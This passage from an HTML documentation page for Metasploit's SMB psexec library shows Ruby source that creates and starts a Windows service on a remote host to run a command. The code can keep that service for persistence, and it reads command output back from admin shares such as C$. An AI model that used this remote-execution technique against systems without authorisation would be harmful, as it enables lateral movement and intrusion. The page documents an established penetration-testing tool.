<span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_svc_status'>svc_status</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_createservicew'>createservicew</span><span class='lparen'>(</span><span class='id identifier rubyid_scm_handle'>scm_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_service_name'>service_name</span><span class='comma'>,</span> <span class='id identifier rubyid_display_name'>display_name</span><span class='comma'>,</span> <span class='id identifier rubyid_command'>command</span><span class='comma'>,</span> <span class='id identifier rubyid_opts'>opts</span><span class='rparen'>)</span>
|
||
|
||
<span class='kw'>case</span> <span class='id identifier rubyid_svc_status'>svc_status</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_SUCCESS</span>
|
||
<span class='id identifier rubyid_vprint_good'>vprint_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Successfully created the service</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_SERVICE_EXISTS</span>
|
||
<span class='id identifier rubyid_service_exists'>service_exists</span> <span class='op'>=</span> <span class='kw'>true</span>
|
||
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service already exists, opening a handle...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_svc_handle'>svc_handle</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_openservicew'>openservicew</span><span class='lparen'>(</span><span class='id identifier rubyid_scm_handle'>scm_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_service_name'>service_name</span><span class='rparen'>)</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_ACCESS_DENIED</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Unable to create service, ACCESS_DENIED, did AV gobble your binary?</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>false</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Failed to create service, ERROR_CODE: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_svc_status'>svc_status</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>false</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>No service handle retrieved</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>false</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_service_description'>service_description</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Changing service description...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_changeservicedescription'>changeservicedescription</span><span class='lparen'>(</span><span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='comma'>,</span> <span class='id identifier rubyid_service_description'>service_description</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Starting the service...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_svc_status'>svc_status</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_startservice'>startservice</span><span class='lparen'>(</span><span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='rparen'>)</span>
|
||
<span class='kw'>case</span> <span class='id identifier rubyid_svc_status'>svc_status</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_SUCCESS</span>
|
||
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service started successfully...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_FILE_NOT_FOUND</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service failed to start - FILE_NOT_FOUND</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_ACCESS_DENIED</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service failed to start - ACCESS_DENIED</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>when</span> <span class='const'>ERROR_SERVICE_REQUEST_TIMEOUT</span>
|
||
<span class='id identifier rubyid_print_good'>print_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service start timed out, OK if running a command or non-service executable...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Service failed to start, ERROR_CODE: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_svc_status'>svc_status</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>ensure</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='comment'># If service already exists don't delete it!
|
||
</span> <span class='comment'># Maybe we could have a force cleanup option..?
|
||
</span> <span class='kw'>if</span> <span class='id identifier rubyid_service_exists'>service_exists</span>
|
||
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Not removing service as it already existed...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>elsif</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_PERSIST</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='id identifier rubyid_print_warning'>print_warning</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Not removing service for persistence...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Removing the service...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_svc_status'>svc_status</span> <span class='op'>=</span> <span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_deleteservice'>deleteservice</span><span class='lparen'>(</span><span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='rparen'>)</span>
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_svc_status'>svc_status</span> <span class='op'>==</span> <span class='const'>ERROR_SUCCESS</span>
|
||
<span class='id identifier rubyid_vprint_good'>vprint_good</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Successfully removed the service</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>else</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Unable to remove the service, ERROR_CODE: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_svc_status'>svc_status</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>ensure</span>
|
||
<span class='id identifier rubyid_vprint_status'>vprint_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Closing service handle...</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_svc_client'>svc_client</span><span class='period'>.</span><span class='id identifier rubyid_closehandle'>closehandle</span><span class='lparen'>(</span><span class='id identifier rubyid_svc_handle'>svc_handle</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>if</span> <span class='id identifier rubyid_disconnect'>disconnect</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_address'>address</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\IPC$</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span>
|
||
|
||
<span class='kw'>true</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="service_description-instance_method">
|
||
|
||
#<strong>service_description</strong> ⇒ <tt>String</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Retrieve the SERVICE_DESCRIPTION option</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>the service description.</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 60</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_service_description'>service_description</span>
|
||
<span class='ivar'>@service_description</span> <span class='op'>||=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_DESCRIPTION</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="service_name-instance_method">
|
||
|
||
#<strong>service_name</strong> ⇒ <tt>String</tt>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Retrieve the SERVICE_NAME option, generate a random one if not already set.</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>the name of the service.</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 43</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_service_name'>service_name</span>
|
||
<span class='ivar'>@service_name</span> <span class='op'>||=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>SERVICE_NAME</span><span class='tstring_end'>'</span></span><span class='rbracket'>]</span>
|
||
<span class='ivar'>@service_name</span> <span class='op'>||=</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
<div class="method_details ">
|
||
<h3 class="signature " id="smb_read_file-instance_method">
|
||
|
||
#<strong>smb_read_file</strong>(smbshare, host, file) ⇒ <tt>String</tt><sup>?</sup>
|
||
|
||
|
||
|
||
|
||
|
||
</h3><div class="docstring">
|
||
<div class="discussion">
|
||
|
||
<p>Retrieves the output of the executed command by reading the output file from the given SMB share.</p>
|
||
|
||
|
||
</div>
|
||
</div>
|
||
<div class="tags">
|
||
<p class="tag_title">Parameters:</p>
|
||
<ul class="param">
|
||
|
||
<li>
|
||
|
||
<span class='name'>smbshare</span>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>The SMBshare to connect to. Usually C$</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
<li>
|
||
|
||
<span class='name'>host</span>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>Remote host to connect to, as an IP address or hostname</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
<li>
|
||
|
||
<span class='name'>file</span>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>Path to the output file, relative to the smbshare. Example: '\WINDOWS\Temp\outputfile.txt'</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
<p class="tag_title">Returns:</p>
|
||
<ul class="return">
|
||
|
||
<li>
|
||
|
||
|
||
<span class='type'>(<tt>String</tt>, <tt>nil</tt>)</span>
|
||
|
||
|
||
|
||
—
|
||
<div class='inline'>
|
||
<p>output or nil on failure</p>
|
||
</div>
|
||
|
||
</li>
|
||
|
||
</ul>
|
||
|
||
</div><table class="source_code">
|
||
<tr>
|
||
|
||
<td>
|
||
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/client/psexec.rb', line 72</span>
|
||
|
||
<span class='kw'>def</span> <span class='id identifier rubyid_smb_read_file'>smb_read_file</span><span class='lparen'>(</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='comma'>,</span> <span class='id identifier rubyid_host'>host</span><span class='comma'>,</span> <span class='id identifier rubyid_file'>file</span><span class='rparen'>)</span>
|
||
<span class='kw'>begin</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_connect'>connect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_host'>host</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_file'>file</span> <span class='op'>=</span> <span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_open'>open</span><span class='lparen'>(</span><span class='id identifier rubyid_file'>file</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>'</span><span class='tstring_content'>o</span><span class='tstring_end'>'</span></span><span class='rparen'>)</span>
|
||
<span class='id identifier rubyid_contents'>contents</span> <span class='op'>=</span> <span class='id identifier rubyid_file'>file</span><span class='period'>.</span><span class='id identifier rubyid_read'>read</span>
|
||
<span class='id identifier rubyid_file'>file</span><span class='period'>.</span><span class='id identifier rubyid_close'>close</span>
|
||
<span class='id identifier rubyid_simple'>simple</span><span class='period'>.</span><span class='id identifier rubyid_disconnect'>disconnect</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>\\\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_host'>host</span><span class='embexpr_end'>}</span><span class='tstring_content'>\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_smbshare'>smbshare</span><span class='embexpr_end'>}</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='id identifier rubyid_contents'>contents</span>
|
||
<span class='kw'>rescue</span> <span class='const'><span class='object_link'><a href="../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB.html" title="Rex::Proto::SMB (module)">SMB</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB/Exceptions.html" title="Rex::Proto::SMB::Exceptions (module)">Exceptions</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Rex/Proto/SMB/Exceptions/ErrorCode.html" title="Rex::Proto::SMB::Exceptions::ErrorCode (class)">ErrorCode</a></span></span><span class='comma'>,</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Error</span><span class='op'>::</span><span class='const'>RubySMBError</span> <span class='op'>=></span> <span class='id identifier rubyid_e'>e</span>
|
||
<span class='id identifier rubyid_print_error'>print_error</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>"</span><span class='tstring_content'>Unable to read file </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_file'>file</span><span class='embexpr_end'>}</span><span class='tstring_content'>. </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_class'>class</span><span class='embexpr_end'>}</span><span class='tstring_content'>: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_e'>e</span><span class='embexpr_end'>}</span><span class='tstring_content'>.</span><span class='tstring_end'>"</span></span><span class='rparen'>)</span>
|
||
<span class='kw'>return</span> <span class='kw'>nil</span>
|
||
<span class='kw'>end</span>
|
||
<span class='kw'>end</span></pre>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
</div>
|
||
|
||
</div>
|
||
|
||
</div>
|
||
|
||
|
||
|
||
</div>
|
||
</body>
|
||
</html> |